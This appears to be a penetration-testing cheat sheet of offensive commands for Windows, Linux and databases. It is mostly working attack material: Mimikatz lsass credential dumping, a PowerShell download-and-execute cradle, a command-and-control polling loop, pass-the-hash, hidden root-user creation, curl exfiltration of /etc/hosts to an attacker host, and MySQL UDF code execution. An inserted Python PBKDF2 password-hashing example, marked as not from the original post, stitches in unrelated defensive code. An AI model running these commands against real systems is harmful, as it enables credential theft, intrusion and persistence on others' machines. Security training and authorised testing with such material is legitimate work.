Windows
List Domain Controller
nltest /dsgetdc:domainname (does not work for XP)
net groups /domain
Pull system info
systeminfo
Determine OS architecture
Wmic os get osarchitecture
Ping sweep
for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i -w 100 | findstr "Reply"
Determine OS Version
systeminfo | findstr /B /C:"OS Name"
Show all available shares
for /f %a in ('net view ^| findstr "\\"') do net view %a
Start new process from shell
start cmd.exe /c whoami
Determine PowerShell architecture
[intptr]::size (4=32, 8=64)
Dump Wireless Config
netsh wlan export profile name="Free Viruses Here" key="clear"
Offline Mimikatz (from an lsass dump)
procdump.exe -accepteula -ma lsass.exe ldump
sekurlsa::Minidump ldump.dmp
sekurlsa::logonPasswords
Yay
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://127.0.0.1/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
CC
while (1) {$bob=((new-object net.webclient).downloadstring('http://ip/file')); if ($bob | select-string "WARNING") {echo "good"} else {echo "bad"}; sleep(60)}
Get Domain Controllers (PowerShell)
[system.directoryservices.activedirectory.domain]::getcurrentdomain().domaincontrollers
Exfil via PS
powershell.exe "$data = $host.version; $ip = 'http://192.168.1.1/'; $url = echo $ip$data; (new-object System.Net.WebClient).Downloadfile($url, 'nc.exe')"
Enum File Shares via PS
PS> dir \\server\sharename -Recurse -Include *.txt,*.vbs,*.ps1,*.xml | Select-String -Pattern "username|password"
Level Up
exploits
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s wdscapture.inf (win2k8)
dir /b /s *pass*
post/multi/recon/local_exploit_suggester
weak service perms
unquoted service paths
unquoted autoruns
weak directory perms for dll attack
weak binary perms
schtasks /query /fo list /v
AlwaysInstallElevated
echo %PATH%
accesschk.exe -p -f * | findstr -i "seassign setake sedebug seimpersonate"
findstr /S cpassword \\dc1.corp.com\sysvol\*.xml
ms14-068
kerberoast
WRITE_DAC
--------
cacls /e /g domain\user:F
Dump Credential Manager
vaultcmd /listcreds:"Windows Credentials" /all
PSRemoting/WinRM with Explicit Creds via MSF
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > $user = "DOMAIN\user"
PS > $pwd = "password123"
PS > $p = ConvertTo-SecureString $pwd -AsPlainText -Force
PS > $c = New-object -typename System.management.automation.pscredential -argumentlist $user, $p
PS > connect-wsman -credential $c -computername hostname.domain.local
PS > cd wsman:
PS > ls
PSConsole History
type %userprofile%\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\Consolehost_history.txt
Pull AD properties using alternate creds via PowerView
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword);
Get-DomainObject -Credential $Cred -Identity 'windows1'
AD Password Policy via RSAT
Get-ADDefaultDomainPasswordPolicy -Server 192.168.1.5
Enumerate LAPS Permission Config
https://github.com/leoloobeek/LAPSToolkit
https://github.com/kfosaaen/Get-LAPSPasswords
PowerUpSQL to Enumerate accessible DBs w/domain creds
$Accessible = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -eq 'Accessible'}
PowerUpSQL to test vendor creds
Get-SQLInstanceDomain -Verbose | Get-SQLServerLoginDefaultPw -Verbose
PowerUpSQL to test command exec/sysadmin role
$Accessible | Invoke-SQLOSCmd -Verbose -Command "whoami" -Threads 10
PowerUpSQL to leak service hashes
$Accessible | Get-SQLQuery -Verbose -Query "xp_dirtree '\\ip\test.txt'"
PTH
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND
Share/File Finder
Find-DomainShare -CheckShareAccess 2>$null | % {'\\' + $_.ComputerName + '\' + $_.Name} | sls -Pattern 'print\$' -NotMatch | Out-File accessible-file-shares.txt
Invoke-ShareFinder -Ping -CheckShareAccess -Verbose | Out-File -Encoding ascii found_shares.txt
Invoke-FileFinder -ShareList .\found_shares.txt -OutFile found_files.csv
Linux
Ping Sweep
for ((i=1; i<255; i++)); do ping -c 1 192.168.1.$i | grep "64 bytes"; done
Add new root user
useradd -o -u 0 [username]
Upgrade from a Shell to TTY via Python
python -c 'import pty;pty.spawn("/bin/bash")'
Find setuid/setgid Binaries
find / -perm /6000 -type f -exec ls -ld {} \; > setuid.txt
find / -type f \( -perm -4000 -o -perm -2000 \)
ID System
cat /etc/lsb-release -- Ubuntu
cat /etc/redhat-release -- Redhat
Grep Folder
grep -ir "pass" ./*
SSH/Run CMD
ssh secret@127.0.0.1 -i key -p 22 'cat flag.txt'
Exfil via HTTP
file=`cat /etc/hosts`;curl --data "$file" http://data.attacker.com
MSSQL
Useful stored procedures
xp_cmdshell
xp_dirtree
xp_fileexist
xp_cmdshell 2005/2008
EXEC+master..sp_configure+'show+advanced+options',1;+RECONFIGURE+WITH+OVERRIDE;+EXEC+master..sp_configure+'xp_cmdshell',0;+RECONFIGURE+WITH+OVERRIDE;+EXEC+sp_configure+'show+advanced+options',0;+RECONFIGURE+WITH+OVERRIDE
MySQL
/var/lib/mysql/mysql/user.MYD
cat /etc/my.cnf | grep user
cat /etc/mysql/my.cnf | grep user
select @@plugin_dir
select 'x' into dumpfile 'c:\\mysql\\lib\\plugin::$INDEX_ALLOCATION'
UDF
select load_file('/etc/mysql/my.cnf');
# MySQL < 5.1: plugin dir is /usr/lib
# MySQL >= 5.1: plugin dir is /usr/lib/mysql/plugin
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from foo into dumpfile '/usr/lib/lib_mysqludf_sys.so';
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.so';
Misc
NTDS.dit
secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL
Dump metasploit output to a file
spool filename.txt
spool off
Create Java WAR file
jar cvf boom.war boom.jsp
Use Aircrack-ng to create WPA handshake file for cracking with Hashcat
# Creates a file called handshake.hccap
aircrack-ng /tmp/handshake.cap -J handshake
Find juicy domain info
C:\>dir \\{domain}\SYSVOL\ /b /s | findstr /i "groups.xml services.xml scheduledtasks.xml printers.xml drives.xml datasources.xml"
Crack NetLM Hashes
./rcracki_mt -h [first16ofhash] [RTable files]
/opt/metasploit/tools/halflm_second.rb -n [NetLM HASH] -p [first7] -s [Challenge seed]
Pesky Shellcode Chars
msfencode -b '\x00\x0a\x0d'
Run a DLL
Rundll32 c:\program.dll, @DllMain12
Malware Dropper/Payload Extensions
- .vbs, .vba, .vbe, .vb
- .wsh, .wsf, .wsc, .ws
- .js, .jse
- .hta (mshta.exe)
Remote access ports
set ports 21,22,23,25,135,139,443,445,3389,80,5985,5986
VNC? RLY?
RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: Password
TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
Value: Password or PasswordViewOnly
TigerVNC
HKEY_LOCAL_MACHINE\Software\TigerVNC\WinVNC4
Value: Password
UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2
Read More: https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/
Sploitz
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
Linux Kernel udev < 141 Local Privilege Escalation Exploit
Linux Kernel 2.4/2.6 - sock_sendpage() Local root
Crypto
OpenSSL AES Decrypt (key and IV are given as hex; use aes-128-cbc for a 128-bit key)
openssl aes-256-cbc -K <hex key> -iv <hex iv> -d -in secret.txt.enc -out plain.txt
OpenSSL AES Encrypt
openssl aes-256-cbc -K <hex key> -iv <hex iv> -e -in secret.txt -out secret.txt.enc
Strong Algorithms
bcrypt
PBKDF2
scrypt
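For the password-storage recommendation above, an added example (not from the original post) of hashing and checking passwords with PBKDF2-HMAC-SHA256 from the Python standard library: per-user random salt, a self-describing record, constant-time comparison and a work-factor check for rehashing old records. The iteration count and record format are assumptions.

```python
import base64
import hashlib
import hmac
import os
from typing import Optional

# Policy values are assumptions for this example (OWASP-style PBKDF2-HMAC-SHA256 settings).
PBKDF2_ITERATIONS = 600_000
SALT_BYTES = 16
HASH_BYTES = 32
ALGO = "pbkdf2_sha256"


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS,
                  salt: Optional[bytes] = None) -> str:
    """Hash a password with a random salt and return a self-describing record:
    algorithm$iterations$salt_b64$hash_b64, so the parameters travel with the hash."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=HASH_BYTES)
    return "$".join([ALGO, str(iterations),
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(dk).decode("ascii")])


def parse_record(stored: str):
    """Split a record into (iterations, salt, hash); None if malformed or not our format."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != ALGO:
        return None
    try:
        return int(parts[1]), base64.b64decode(parts[2]), base64.b64decode(parts[3])
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iterations; compare in constant time."""
    rec = parse_record(stored)
    if rec is None:
        return False
    iterations, salt, expected = rec
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=len(expected))
    return hmac.compare_digest(dk, expected)


def needs_rehash(stored: str, min_iterations: int = PBKDF2_ITERATIONS) -> bool:
    """True if the record is below the current work-factor policy; rehash on next successful login."""
    rec = parse_record(stored)
    return rec is None or rec[0] < min_iterations
```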
Web
LFI to RCE
logs (apache/ssh/error/etc)
php://input
/proc/self/environ
file descriptors (/proc/self/fd/[0-255] || /proc/self/cmdline )
Links
Example Hashes
https://hashcat.net/wiki/doku.php?id=example_hashes
LFI/RFI Cheat Sheet
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
Python Tools
https://github.com/dloss/python-pentest-tools
CTF Tools
http://delimitry.blogspot.co.uk/2014/10/useful-tools-for-ctf.html